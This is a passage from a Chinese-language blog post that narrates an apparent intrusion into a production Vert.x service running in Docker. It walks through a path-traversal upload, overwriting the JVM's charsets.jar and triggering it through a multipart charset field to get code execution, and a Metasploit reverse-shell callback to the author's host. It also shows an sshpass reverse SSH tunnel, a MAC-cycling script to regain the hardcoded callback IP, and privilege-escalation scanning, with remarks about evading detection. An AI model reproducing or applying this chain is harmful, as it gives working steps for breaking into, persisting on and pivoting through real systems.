\u770b\u770b\uff0c\u4e0d\u770b\u4e0d\u8981\u7d27\uff0c\u4e00\u770b\u5413\u4e00\u8df3\uff0c\u5728\u91cc\u9762\u627e\u5230\u4e86 <code>GCC: (Alpine 8.2.0) 8.2.0<\/code> \u5b57\u4e32\u3002\u518d\u8bfb\u4e00\u4e2a <code>\/bin\/busybox<\/code>\uff0c\u679c\u7136\u6709\u3002Alpine \u6211\u8fd8\u53ea\u5728 docker \u91cc\u7528\u8fc7\u3002\u3002\u3002\u8bfb\u4e00\u4e2a <code>\/.dockerenv<\/code> \uff0c\u7136\u540e\u8fd8\u771ftmd\u6709\u3002\u3002\u3002\u672c\u6765\u53ea\u60f3\u5907\u4efd\u4e00\u4e0b\u5c31\u8dd1\u8def\uff0c\u7136\u540e jar \u5305\u540d\u6b7b\u6d3b\u731c\u4e0d\u51fa\u6765\u3002\u3002\u3002\u65e2\u7136\u662f\u5728 docker \u73af\u5883\u91cc\u7684\u8bdd\uff0c\u5176\u4ed6\u4e5f\u6ca1\u4ec0\u4e48\u6709\u7528\u7684\u4e1c\u897f\u4e86\u3002<\/p>\n<p><a id=\"tag_vertx_2\"><\/a>\u00a0<\/p>\n<ul>\n<li>\n<h5>\u6709\u9650\u5236\u7684\u4efb\u610f\u4e0a\u4f20<\/h5>\n<\/li>\n<\/ul>\n<p>\u5176\u5b9e\u5728\u524d\u7aef webpack \u8fc7\u540e\u7684 js \u91cc\u641c\u8def\u7531\u7684\u65f6\u5019\u8fd8\u53d1\u73b0\u4e86\u4e00\u4e2a <code>\/api\/upload<\/code> \uff0c\u53ea\u662f\u5c1d\u8bd5\u4e0b\u6765\u9700\u8981\u7279\u5b9a\u7528\u6237\u6743\u9650\uff0c\u5728\u90a3\u65f6\u8fd8\u65e0\u6cd5\u8fdb\u884c\u6d4b\u8bd5\u3002\u4f46\u662f\u522b\u5fd8\u4e86\uff0cPostgreSQL \u670d\u52a1\u5668\u5df2\u7ecf\u7eb3\u5165\u56ca\u4e2d\uff0c\u4e8e\u914d\u7f6e\u5907\u4efd\u6587\u4ef6\u5904\u53d1\u73b0\u6cc4\u9732\u7684 postgre \u660e\u6587\u5bc6\u7801\u3002\u5728\u6570\u636e\u5e93\u4e2d\u67e5\u8be2\u5230\u76f8\u5e94\u6743\u9650\u7684\u7528\u6237\uff0cMD5 \u7834\u4e0d\u51fa\u6765\u6ca1\u5173\u7cfb\uff0c\u76f4\u63a5\u6539\uff0c\u4e3b\u8981\u7a81\u51fa\u4e00\u4e2a\u5b8c\u5168\u638c\u63a7\u3002<\/p>\n<p>\u767b\u9646\u4e4b\u540e\u6d4b\u8bd5\u4e0a\u4f20\u4efb\u610f\u6587\u4ef6\u6210\u529f\uff0c\u540c\u6837\u627e\u5230\u5bf9\u5e94\u6e90\u4ee3\u7801\u5904\u5f00\u59cb\u5ba1\u8ba1\uff1a<\/p>\n<pre class=\"lang:java decode:true \">\/\/ io.vertx.ext.web.Router\r\nsubRouter.post(\"\/api\/upload\").handler(BodyHandler.create());\r\nsubRouter.post(\"\/api\/upload\").handler(context -&gt; {\r\n    Set&lt;FileUpload&gt; files = context.fileUploads();\r\n    for (FileUpload fileUpload : files) {\r\n        String dirPath = \"upload\/\" + String.format(\"%s\/%s\/%s\/\", \"images\",\r\n            LocalDate.now().getYear(), LocalDate.now().getMonth().getValue());\r\n        String path = dirPath + fileUpload.fileName();\r\n        FileSystem fileSystem = vertx.fileSystem();\r\n        if (!fileSystem.existsBlocking(dirPath))\r\n            fileSystem.mkdirsBlocking(dirPath);\r\n        if (fileSystem.existsBlocking(path))\r\n            fileSystem.deleteBlocking(path);\r\n        fileSystem.moveBlocking(fileUpload.uploadedFileName(), path);\r\n        System.out.println(\"[I] File upload to \" + path);\r\n    }\r\n    context.response().end(\"upload suc\");\r\n});<\/pre>\n<p>BBQ\uff0c<code>filename<\/code> \u76f4\u63a5\u62fc\u8fdb\u53bb\uff0c\u7406\u8bba\u4e0a\u53ef\u4ee5\u8986\u76d6\u4efb\u610f\u6587\u4ef6\uff0c\u65e0\u6cd5\u521b\u5efa\u76ee\u5f55\u3002\u7136\u540e\u4e0a\u4f20\u5b8c\u662f\u6ca1\u6709\u56de\u663e\u7684\u3002\u3002\u3002\u6ca1\u9519\uff0c\u6839\u672c\u4e0d\u77e5\u9053\u4e0a\u4f20\u5230\u54ea\u4e86\uff0c\u4e4b\u540e\u624d\u5728\u6570\u636e\u5e93\u91cc\u53d1\u73b0\u76f8\u5e94\u7684\u8bb0\u5f55\u3002\u6d4b\u8bd5\u4e0a\u4f20\u5230 <code>..\/..\/..\/..\/..\/..\/..\/..\/..\/root\/test.txt<\/code> \uff0c\u7136\u540e\u4f7f\u7528\u4e0a\u9762\u7684\u4efb\u610f\u4e0b\u8f7d\u6210\u529f\u3002\u521d\u6b65\u7684\u80dc\u5229\u3002\u73b0\u5728\u5206\u522b\u6709\u4e86\u4e00\u4e2a\u6709\u9650\u5236\u7684\u4efb\u610f\u4e0b\u8f7d\u4e0e\u4e0a\u4f20\uff0c\u5b83\u4eec\u4e24\u4e2a\u5171\u540c\u6f14\u594f\u51fa\u7684\uff0c\u662f\u52a8\u542c\u7684\u4ea4\u54cd\u66f2\uff0c\u8fd8\u662f\u6076\u9b54\u7684\u65cb\u5f8b\uff1f<\/p>\n<p><a id=\"tag_vertx_3\"><\/a>\u00a0<\/p>\n<ul>\n<li>\n<h5>\u4e8c\u91cd\u594f\u7684 RCE<\/h5>\n<\/li>\n<\/ul>\n<p>\u9274\u4e8e\u662f\u5728 docker \u73af\u5883\u91cc\uff0c\u53ef\u4e0b\u8f7d\u7684\u4e1c\u897f\u5c11\u5f97\u53ef\u601c\uff0c\u53ef\u8986\u76d6\u7684\u4e1c\u897f\u4e5f\u5c11\u5f97\u53ef\u601c\u3002cron \u80af\u5b9a\u662f\u6ca1\u6709\u7684\u3002\u53c8\u7531\u4e8e\u662f java\uff0c\u611f\u89c9\u4e0d\u600e\u4e48\u4f1a reload \u6216\u8005\u5f80\u5916\u52a0\u8f7d\u5565\u4e1c\u897f\u3002\u7531\u4e8e\u662f\u751f\u4ea7\u73af\u5883\uff0c\u4e5f\u4e0d\u6562\u4e71\u8986\u76d6 libc \u8fd9\u6837\u7684\u4e1c\u897f\uff0c\u4e07\u4e00\u6253\u6302\u4e86\u548b\u529e\u3002<\/p>\n<p>\u7136\u540e\u5728\u4f5b\u524d\u82e6\u82e6\u6c42\u4e86\u51e0\u5343\u5e74\uff0c\u627e\u5230\u4e86\u5927\u4f6c\u7684\u6587\u7ae0\u300a<a href=\"https:\/\/landgrey.me\/blog\/22\/\">Spring Boot Fat Jar \u5199\u6587\u4ef6\u6f0f\u6d1e\u5230\u7a33\u5b9a RCE \u7684\u63a2\u7d22<\/a>\u300b\uff0c\u5927\u4f53\u4e0a\u6765\u8bf4\u5c31\u662f JVM \u4f1a\u5ef6\u8fdf\u52a0\u8f7d\u67d0\u4e9b\u5185\u7f6e\u7684 jar \u6587\u4ef6\uff0c\u6bd4\u5982 <code>jre\/lib\/charsets.jar<\/code> \u4f1a\u5728\u7b2c\u4e00\u6b21\u8c03\u7528 <code>Charset.forName()<\/code> \u540e\u624d\u88ab\u6253\u5f00\u8bfb\u5165\u5185\u5b58\uff0c\u4f7f\u5f97\u4ee5\u4e0b\u7684\u64cd\u4f5c\u6210\u4e3a\u53ef\u80fd\uff1a\u8986\u76d6 charsets.jar \u2192 \u7b2c\u4e00\u6b21\u89e6\u53d1 Charset.forName() \u2192 \u8bfb\u5165 charsets.jar \u5e76\u6267\u884c\u6076\u610f class \u4ee3\u7801\u3002<\/p>\n<p>\u539f\u6587\u662f\u5728 Springboot \u91cc\u7684\uff0c\u800c Vert.x \u4f7f\u7528\u7684\u662f Netty\u3002\u4e0d\u8fc7\u5927\u5dee\u4e0d\u5dee\uff0c\u76f4\u63a5\u5f00\u641c\uff1a<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1784\" src=\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-search-charsetforname.png\" alt=\"\" width=\"804\" height=\"457\" srcset=\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-search-charsetforname.png 804w, https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-search-charsetforname-300x171.png 300w, https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-search-charsetforname-150x85.png 150w, https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-search-charsetforname-768x437.png 768w\" sizes=\"auto, (max-width: 804px) 100vw, 804px\" \/><\/p>\n<p>\u5b9a\u4f4d\u5230\u53ef\u7591\u4ee3\u7801\u5904\uff1a<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1786\" src=\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-multipart-1.png\" alt=\"\" width=\"997\" height=\"530\" srcset=\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-multipart-1.png 997w, https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-multipart-1-300x159.png 300w, https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-multipart-1-150x80.png 150w, https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-multipart-1-768x408.png 768w\" sizes=\"auto, (max-width: 997px) 100vw, 997px\" \/><\/p>\n<p>\u56de\u6eaf\u4e00\u5c42\uff1a<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1785\" src=\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-multipart-2.png\" alt=\"\" width=\"1025\" height=\"719\" srcset=\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-multipart-2.png 1025w, https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-multipart-2-300x210.png 300w, https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-multipart-2-150x105.png 150w, https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-multipart-2-768x539.png 768w\" sizes=\"auto, (max-width: 1025px) 100vw, 1025px\" \/><\/p>\n<p>\u53ef\u4ee5\u53d1\u73b0\uff0c<code>this.currentFieldAttributes<\/code> \u662f\u5b8c\u5168\u53ef\u63a7\u7684\uff0c\u4e5f\u5c31\u662f\u8bf4\uff0c\u63d0\u4ea4\u5982\u4e0b\u7684 multipart \u5b57\u6bb5\uff1a<\/p>\n<pre class=\"lang:default decode:true \">--BOUNDARY_HERE\r\nContent-Disposition: form-data; name=\"charset\"; charset=\"IBM037\"\r\n<\/pre>\n<p>\u5373\u53ef\u89e6\u53d1 JVM \u8bfb\u53d6 charsets.jar \u91cc\u9762\u7684 IBM037 \u7f16\u7801\u3002<\/p>\n<p>\u7531\u4e8e\u53ea\u6709\u4e00\u6b21\u673a\u4f1a\uff0c\u6240\u4ee5\u5fc5\u987b\u7279\u522b\u8c28\u614e\u3002\u5728\u672c\u673a\u8d77\u4e00\u4e2a <code>java -XX:+TraceClassLoading -jar demo.jar<\/code> \u89c2\u5bdf\uff1a<\/p>\n<pre class=\"lang:default decode:true \">Request: http:\/\/127.0.0.1:8888\/api\/upload\r\n[Loaded java.nio.charset.Charset$ExtendedProviderHolder from \/opt\/java\/openjdk\/jre\/lib\/rt.jar]\r\n[Loaded java.nio.charset.Charset$ExtendedProviderHolder$1 from \/opt\/java\/openjdk\/jre\/lib\/rt.jar]\r\n[Opened \/opt\/java\/openjdk\/jre\/lib\/charsets.jar]\r\n[Loaded sun.nio.cs.AbstractCharsetProvider from \/opt\/java\/openjdk\/jre\/lib\/rt.jar]\r\n[Loaded sun.nio.cs.ext.ExtendedCharsets from \/opt\/java\/openjdk\/jre\/lib\/charsets.jar]\r\n[Loaded sun.nio.cs.ext.IBM037 from \/opt\/java\/openjdk\/jre\/lib\/charsets.jar]\r\n[Loaded sun.nio.cs.SingleByte from \/opt\/java\/openjdk\/jre\/lib\/rt.jar]<\/pre>\n<p>\u5728\u5305\u542b\u5982\u4e0a\u7684 multipart \u5b57\u6bb5\u540e\uff0c\u8bb0\u5f55\u91cc\u4eae\u773c\u7684 <code>Opened \/opt\/java\/openjdk\/jre\/lib\/charsets.jar<\/code> \u8ddf <code>Loaded sun.nio.cs.ext.IBM037<\/code> \u8bc1\u660e\u4e86\u8be5\u65b9\u6cd5\u7684\u53ef\u884c\u6027\u3002<\/p>\n<p>\u4e8e\u662f\u9009\u62e9\u51a4\u5927\u5934 IBM037 \u4e0b\u624b\uff0c\u5176\u4ed6\u4ee3\u7801\u5168\u90fd\u4e0d\u9700\u8981\uff0c\u53ea\u7559\u4e2a\uff1a<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1787\" src=\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-ibm037.png\" alt=\"\" width=\"532\" height=\"448\" srcset=\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-ibm037.png 532w, https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-ibm037-300x253.png 300w, https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-ibm037-150x126.png 150w\" sizes=\"auto, (max-width: 532px) 100vw, 532px\" \/><\/p>\n<p>\u4e0a\u4f20\u8986\u76d6 charsets.jar \uff0c\u7136\u540e\u89e6\u53d1 Charset.forName \uff0c\u53ef\u4ee5\u770b\u5230 Hello World \u7a0b\u5e8f\u6267\u884c\u4e86\uff01\uff01\u5f53\u7136\uff0c\u7531\u4e8e\u61d2\u5f97\u627e\u53cd\u7f16\u8bd1\u8fdb\u53bb\u7684\u65f6\u5019\u9700\u8981\u7684\u5176\u4ed6\u5305\uff0c\u8fd9\u91cc\u4f1a\u6709\u4e00\u4e2a\u62a5\u9519\uff0c\u4f46\u662f\u5e76\u4e0d\u91cd\u8981\u3002\u5b83\uff01\u6267\uff01\u884c\uff01\u4e86\uff01<\/p>\n<pre class=\"lang:default decode:true \">Hello World!!!\r\nSep 01, 2023 11:43:07 AM io.vertx.core.impl.ContextImpl\r\nSEVERE: Unhandled exception\r\njava.lang.ClassCastException: sun.nio.cs.ext.IBM037 cannot be cast to java.nio.charset.Charset\r\n        at sun.nio.cs.AbstractCharsetProvider.lookup(AbstractCharsetProvider.java:144)\r\n        at sun.nio.cs.AbstractCharsetProvider.charsetForName(AbstractCharsetProvider.java:159)\r\n        at java.nio.charset.Charset.lookupExtendedCharset(Charset.java:452)\r\n        at java.nio.charset.Charset.lookup2(Charset.java:476)\r\n        at java.nio.charset.Charset.lookup(Charset.java:464)\r\n        at java.nio.charset.Charset.forName(Charset.java:528)\r\n        at io.netty.handler.codec.http.multipart.HttpPostMultipartRequestDecoder.decodeMultipart(HttpPostMultipartRequestDecoder.java:498)\r\n        at io.netty.handler.codec.http.multipart.HttpPostMultipartRequestDecoder.parseBodyMultipart(HttpPostMultipartRequestDecoder.java:442)\r\n        at io.netty.handler.codec.http.multipart.HttpPostMultipartRequestDecoder.parseBody(HttpPostMultipartRequestDecoder.java:411)\r\n        at io.netty.handler.codec.http.multipart.HttpPostMultipartRequestDecoder.offer(HttpPostMultipartRequestDecoder.java:336)\r\n        at io.netty.handler.codec.http.multipart.HttpPostMultipartRequestDecoder.offer(HttpPostMultipartRequestDecoder.java:53)\r\n        at io.netty.handler.codec.http.multipart.HttpPostRequestDecoder.offer(HttpPostRequestDecoder.java:223)\r\n        at io.vertx.core.http.impl.HttpServerRequestImpl.onData(HttpServerRequestImpl.java:486)\r\n        at io.vertx.core.http.impl.HttpServerRequestImpl.handleContent(HttpServerRequestImpl.java:136)\r\n        at io.vertx.core.http.impl.Http1xServerConnection.handleContent(Http1xServerConnection.java:160)\r\n        at io.vertx.core.http.impl.Http1xServerConnection.handleMessage(Http1xServerConnection.java:140)\r\n        at io.vertx.core.impl.ContextImpl.executeTask(ContextImpl.java:369)\r\n        at io.vertx.core.impl.EventLoopContext.execute(EventLoopContext.java:43)\r\n        at\r\n...................................<\/pre>\n<p>\u8def\u5df2\u7ecf\u94fa\u597d\u4e86\uff0c\u63a5\u4e0b\u6765\u53ea\u9700\u8981\u628a\u5b83\u8d70\u5b8c\u3002<\/p>\n<p>\u7531\u4e8e\u662f Alpine\uff0c\u8bfb\u4e00\u4e2a <code>\/lib\/apk\/db\/installed<\/code> \u6cc4\u9732\u51fa JRE \u7684\u8def\u5f84 <code>\/usr\/lib\/jvm\/java-1.8-openjdk\/jre\/<\/code> \uff0c\u4e3a\u4e86\u9632\u6b62\u4e0d\u517c\u5bb9\u76f4\u63a5\u4e0b\u4e00\u4e2a\u4e0a\u9762\u7684 charsets.jar \u6539\u3002\u8fd9\u91cc\u9700\u8981\u6ce8\u610f\u7684\u662f\uff0cnginx \u9ed8\u8ba4\u4e0a\u4f20\u5927\u5c0f\u662f 1MB\uff0c\u800c\u8fd9\u91cc\u7684 charsets.jar \u6709 1.8MB\u3002\u3002\u3002\u9700\u8981\u5220\u4e00\u70b9\u770b\u8d77\u6765\u4e0d\u600e\u4e48\u6709\u7528\u7684\u7f16\u7801\uff08\u6bd4\u5982\u8bf4\uff0c\u9664\u4e86 IBM037 \u4e4b\u5916\u6240\u6709 IBM \u6253\u5934\u7684 233\uff09\u3002\u7136\u540e\u8fd8\u662f\u76f8\u540c\u7684\u6d41\u7a0b\u3002\u6210\u529f\u4e0a\u7ebf\uff1a<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1788\" src=\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-msf-online.png\" alt=\"\" width=\"573\" height=\"223\" srcset=\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-msf-online.png 573w, https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-msf-online-300x117.png 300w, https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-msf-online-150x58.png 150w\" sizes=\"auto, (max-width: 573px) 100vw, 573px\" \/><\/p>\n<p>\u63a5\u7740\u53d1\u73b0\u51e0\u4ef6\u65e0\u8bed\u7684\u4e8b\u60c5\uff1a\u6587\u4ef6\u4e0b\u8f7d\u5904\uff0c\u5b9e\u9645\u4e0a\u79bb\u6839\u76ee\u5f55\u53ea\u6709\u4e24\u5c42\uff0c\u6839\u672c\u6ca1\u5fc5\u8981\u7ed5\u8fc7 nginx\u3002\u3002\u3002\u7136\u540e\u5728\u540c\u76ee\u5f55\u4e0b config.json \u5c31\u53ef\u4ee5\u76f4\u63a5\u8bfb\u5230 pgSQL \u7684\u5bc6\u7801\uff0c\u662f\u5f00\u7aef\u53e3\u7684\uff0c\u53ef\u4ee5\u76f4\u63a5\u8fde\u3002\u3002\u3002\u541b\u5b50\u4e0d\u8ba1\u5c0f\u4eba\u8fc7\uff0c\u90fd RCE \u4e86\uff0c\u5c31\u7b97\u4e86\u3002<\/p>\n<p>&nbsp;<\/p>\n<p><a id=\"tag_3_ip\"><\/a>\u00a0<\/p>\n<hr \/>\n<h4>\u5e55\u95f4<\/h4>\n<ul>\n<li>\n<h5>IP \u98ce\u6ce2<\/h5>\n<\/li>\n<\/ul>\n<p>\u7531\u4e8e\u7b2c\u4e00\u6b21 exp \u65f6\u5f80 charsets.jar \u91cc\u5199\u7684\u662f\u786c\u7f16\u7801\u7684 IP\uff0c\u7136\u540e\u4e2d\u95f4\u51fa\u53bb\u4e0a\u4e86\u4e00\u5929\u8bfe\uff0c\u56de\u6765\u53d1\u73b0 IP \u53d8\u4e86\u3002\u3002\u3002\u8fd9\u5c31\u6bd4\u8f83\u5c34\u5c2c\u4e86\u3002\u4e8e\u662f\u53ea\u80fd\u60f3\u529e\u6cd5\u628a\u539f\u6765\u7684 IP \u5237\u56de\u6765\u3002\u624b\u52a8\u6362 MAC \u5730\u5740\u611f\u89c9\u4e0d\u662f\u4e2a\u5934\uff0c\u5c31\u53eb ChatGPT \u5199\u4e86\u4e2a\u811a\u672c\u5237 IP\u3002<\/p>\n<pre class=\"minimize:true lang:default decode:true \" title=\"&lt;Click to Expand&gt; A simple bash script to change MAC and check IP\">#!\/bin\/bash\r\n\r\n# Function to get current IPv4 address\r\nget_ip() {\r\n  ip -4 addr show ens33 | grep inet | awk '{print $2}' | cut -d\/ -f1\r\n}\r\n\r\n# Function to get current time in HH:MM:SS format\r\ncurrent_time() {\r\n  echo $(date +\"%T\")\r\n}\r\n\r\n# Function to increase MAC address\r\nincrease_mac() {\r\n  local old_mac=$1\r\n  IFS=':' read -ra mac_parts &lt;&lt;&lt; \"$old_mac\"\r\n\r\n  # Start with the last part\r\n  for (( i=${#mac_parts[@]} - 1; i&gt;=0; i-- )); do\r\n    part=$(printf \"%02x\" $(( 0x${mac_parts[i]} + 1 )))\r\n    if [ \"$part\" != \"100\" ]; then\r\n      mac_parts[i]=$part\r\n      break\r\n    else\r\n      mac_parts[i]=\"00\"\r\n    fi\r\n  done\r\n\r\n  echo $(IFS=:; echo \"${mac_parts[*]}\")\r\n}\r\n\r\n# Save current IPv4 address\r\ncurrent_ip=$(get_ip)\r\necho \"[ $(current_time) ] Current IP: $current_ip\"\r\n\r\n# Initial MAC address\r\nmac=\"00:8c:91:3a:b7:00\"\r\n\r\nwhile true; do\r\n  # Increase MAC address\r\n  mac=$(increase_mac $mac)\r\n  echo \"[ $(current_time) ] Changing MAC to $mac\"\r\n\r\n  # Change ens33 address\r\n  sudo ip link set dev ens33 down\r\n  sudo ip link set dev ens33 address $mac\r\n  sudo ip link set dev ens33 up\r\n\r\n  # Loop to check if IPv4 has changed\r\n  while true; do\r\n    new_ip=$(get_ip)\r\n\r\n    if [ \"$new_ip\" != \"$current_ip\" ]; then\r\n      break\r\n    fi\r\n\r\n    # Wait for 1 second before checking again\r\n    sleep 1\r\n  done\r\n\r\n  # Check whether the new IP is expected\r\n  if [ \"$new_ip\" == \"9.8.7.6\" ]; then\r\n    echo \"[ $(current_time) ] Target IP reached. Exiting.\"\r\n    exit 0\r\n  elif [ \"$new_ip\" == \"\" ]; then\r\n    echo \"[ $(current_time) ] Empty. Waiting for 300s\"\r\n    sudo ip link set dev ens33 down\r\n    sleep 300\r\n  else\r\n    echo \"[ $(current_time) ] New IP: $new_ip\"\r\n    current_ip=$new_ip\r\n  fi\r\ndone\r\n<\/pre>\n<p>\u672c\u6765\u4ee5\u4e3a\u5237\u4e00\u4e2a C \u6bb5\u5c31\u5b8c\u4e8b\u4e86\uff0c\u6ca1\u60f3\u5230\u5b83\u51fa\u73b0\u4e86\u7b2c\u4e8c\u4e2a\u3002\u90a3\u884c\u5427\uff0c\u7ee7\u7eed\u7b49\u7b49\u770b\uff0c\u7ed3\u679c\u51fa\u73b0\u4e86\u7b2c\u4e09\u4e2a\u3002\u3002\u3002\u770b\u4e00\u4e0b IP ASN \u4fe1\u606f\uff0c\u53d1\u73b0\u6574\u4e2a \/16 \u90fd\u662f\u5b66\u6821\u7684\uff0c\u5927\u65e0\u8bed\uff0c\u53ea\u80fd\u6302\u673a\u5237\u7740\u3002\u7761\u4e00\u89c9\u9192\u6765\u53d1\u73b0\u5237\u5230\u7b2c\u4e03\u4e2a\u7684\u65f6\u5019\u5361\u4f4f\u4e86\uff0c\u4f30\u8ba1\u662f\u88ab DHCP \u670d\u52a1\u5668 rate limit \u4e86\u3002\u7b49\u4e86\u534a\u5929\u7ee7\u7eed\u5f00\u5237\uff0c\u8fd9\u4e0b\u7ec8\u4e8e\u7b2c\u4e00\u4e2a\u6bb5\u7684 IP \u8fc7\u671f\u4e86\uff0c\u53c8\u91cd\u65b0\u56de\u6765\u4e86\u3002\u534a\u5c0f\u65f6\u5237\u5230\u4e4b\u524d\u4f7f\u7528\u7684 IP\uff0c\u7136\u540e\u5f53\u505a\u65e0\u4e8b\u53d1\u751f\u3002<\/p>\n<p><a id=\"tag_3_msf\"><\/a>\u00a0<\/p>\n<ul>\n<li>\n<h5>Msf \u98ce\u6ce2<\/h5>\n<\/li>\n<\/ul>\n<p>\u6df1\u4fe1\u670d\u7684\u68c0\u6d4b\u8bbe\u5907\u771ftmdnb\uff0c\u5413\u5f97\u6211\u8fde\u591c\u4e0a\u4e86 msf\u3002\u7136\u540e\u6700\u5b89\u5168\u7684\u5e94\u8be5\u5c5e linux\/x64\/meterpreter_reverse_https \u3002\u6309\u7167\u5b98\u7f51\u6587\u6863\u914d\u597d persistent \u957f\u8fde\u63a5\uff0c\u7761\u4e00\u89c9\u8d77\u6765\u53d1\u73b0 session \u7adf\u7136\u6389\u4e86\u3002\u8bd5\u4e86\u7b2c\u4e8c\u6b21\uff0c\u7b2c\u4e09\u6b21\uff0c\u4e5f\u90fd\u6389\u4e86\u3002\u800c\u4e14\u60c5\u51b5\u5341\u5206\u8be1\u5f02\u3002\u7136\u540e\u53d1\u73b0\u8fd9\u662f meterpreter \u7684 bug\uff0c\u6bd4\u8f83\u65e0\u8bed\u3002\u3002\u3002\u53ea\u8981 LHOST \u65e0\u6cd5\u8fde\u63a5\uff0c\u8fc7\u4e00\u6bb5\u65f6\u95f4\u5c31\u4f1a memory leak \u7136\u540e\u5d29\u6389\uff0cOOM \u6216\u8005\u54ea\u6ea2\u51fa\u4e86\uff0c\u603b\u4e4b\u518d\u4e5f\u8fde\u4e0d\u4e0a\u3002DDNS \u8868\u793a\uff1a\u6211\u505a\u9519\u4ec0\u4e48\u4e86\u3002<\/p>\n<p>\u5df2\u7ecf\u63d0\u4e86 issue\uff0c\u6301\u7eed\u8ddf\u8fdb\u4e2d <span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"https:\/\/github.com\/rapid7\/metasploit-framework\/issues\/18342\">https:\/\/github.com\/rapid7\/metasploit-framework\/issues\/18342<\/a><\/span>\u3002\u8fd9\u9635\u5b50\u6bd4\u8f83\u5fd9\uff0c\u53ef\u80fd\u4e4b\u540e\u6709\u7a7a\u8bfb\u8bfb meterpreter \u7684\u6e90\u4ee3\u7801<sup>[\u57511]<\/sup>\u3002\u6ca1\u529e\u6cd5\uff0c\u53ea\u80fd fallback \u5230 reverse_tcp\uff0c\u4f46\u770b\u8d77\u6765\u4e5f\u80fd\u4f7f\u7528 SSL \u52a0\u5bc6\uff0c\u51d1\u5408\u5427\u3002<\/p>\n<p>\u7136\u540e\u8fc7\u4e86\u51e0\u5929\u53d1\u73b0 reverse_tcp \u4e5f\u6709\u70b9 bug\uff0c\u51c6\u786e\u5730\u8bf4\u5e94\u8be5\u662f TCP \u7684 bug\uff0c\u5177\u4f53\u6765\u8bf4\u5c31\u662f msfconsole \u7684 IP \u88ab\u7acb\u5373\u4e0b\u7ebf\uff08\u5c01\u7981\uff09\u4ee5\u540e\uff0cmeterpreter \u90a3\u8fb9\u7684\u8fde\u63a5\u4e00\u76f4\u4f1a\u662f ESTABLISHED \u7684\uff0c\u4e5f\u5c31\u662f\u8bf4\u518d\u4e5f\u8fde\u4e0d\u56de\u6765\u3002\u3002\u3002\u6ca1\u627e\u5230\u5730\u65b9\u5f00 TCP Keepalive\uff0c\u6bd4\u8f83\u86cb\u75bc\u3002<\/p>\n<p>\u6700\u540e\u662f\u7684\uff0cmeterpreter \u7684 portfwd \u4e5f\u6709\u95ee\u9898\u3002\u7ecf\u5e38\u8fde\u63a5\u4e00\u65ad\uff0csession \u4e5f\u5c31\u65ad\u4e86\uff0c\u7279\u522b\u96be\u7528\u3002\u8fd8\u662f\u5f97 ssh \u628a\u7aef\u53e3\u8f6c\u51fa\u6765\uff1a<\/p>\n<pre class=\"lang:sh decode:true \">sshpass -p xxxxxxxxxxxx ssh -R 11873:127.0.0.1:873 -N sshtunnel@IP -o StrictHostKeyChecking=no -o UserKnownHostsFile=\/dev\/null -o PubkeyAuthentication=no -o ServerAliveInterval=300<\/pre>\n<p>&nbsp;<\/p>\n<p><a id=\"tag_4_pvesc\"><\/a>\u00a0<\/p>\n<hr \/>\n<h4>\u6a2a\u5411\u79fb\u52a8<\/h4>\n<ul>\n<li>\n<h5>\u6f2b\u6f2b\u63d0\u6743\u8def<\/h5>\n<\/li>\n<\/ul>\n<p>\u4ee5 postgres \u7528\u6237\u7684\u6743\u9650\u867d\u7136\u80fd\u8bfb\u5230\u5c0f\u90e8\u5206\u914d\u7f6e\u6587\u4ef6\uff08\u4e3b\u8981\u901a\u8fc7\u5907\u4efd\u6cc4\u9732\uff09\uff0c\u4f46\u603b\u611f\u89c9\u4e0d\u591f\u723d\u5feb\uff0c\u8981\u6253\u5c31\u5f97\u5f80\u6b7b\u91cc\u6253\u3002\u90a3\u4e48\u9996\u5148\uff0c\u5f53\u7136\u662f\u4f7f\u7528\u4eb2\u7231\u7684 local_exploit_suggester \u626b\u4e00\u626b\uff1a<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1796\" src=\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-msf-suggester.jpg\" alt=\"\" width=\"1256\" height=\"381\" srcset=\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-msf-suggester.jpg 1256w, https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-msf-suggester-300x91.jpg 300w, 